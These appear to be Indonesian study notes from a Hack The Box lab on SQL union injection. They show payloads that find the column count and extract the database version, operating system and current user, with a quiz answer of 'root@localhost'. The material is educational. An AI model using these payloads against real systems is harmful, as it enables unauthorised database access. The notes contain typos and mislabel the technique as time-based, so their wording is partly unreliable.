Union Injection

Dalam menggunakans alah satu time in-bind injecion ini, kita harus memastikan letak dari nilai select ditempatkan dimana. Kita bisa mencoba menggunakan query singakat untuk mengetahuinya.

POC

Sent payload

a' UNION SELECT 1,2,3 -- -

initial payload

Opps, ternyata ada perbedaan antara jumlah kolom yang di select antara dua statement select. kita bisa mencoba jumlah select hingga menampilkan hasil injeksi query.

POC

Sent payload

a' UNION SELECT 1,2,3,4 -- -

initial payload

Kita juga dapat menggunakan global variabel pada kolom select untuk mengetahui informasi tertentu melalui global variable yang ditanam pada Uninon injection.

POC

Sent payload

a' UNION SELECT 1,@@version,@@version_compile_os ,4 -- -

initial payload

Quiz

question

Use a Union injection to get the result of 'user()'

Janga lupa untuk menggunakan Openvpn dan spawn target di HTB

Jawaban

a' UNION SELECT 1,2,user(),4 -- -

initial payload

Jawabannya, root@localhost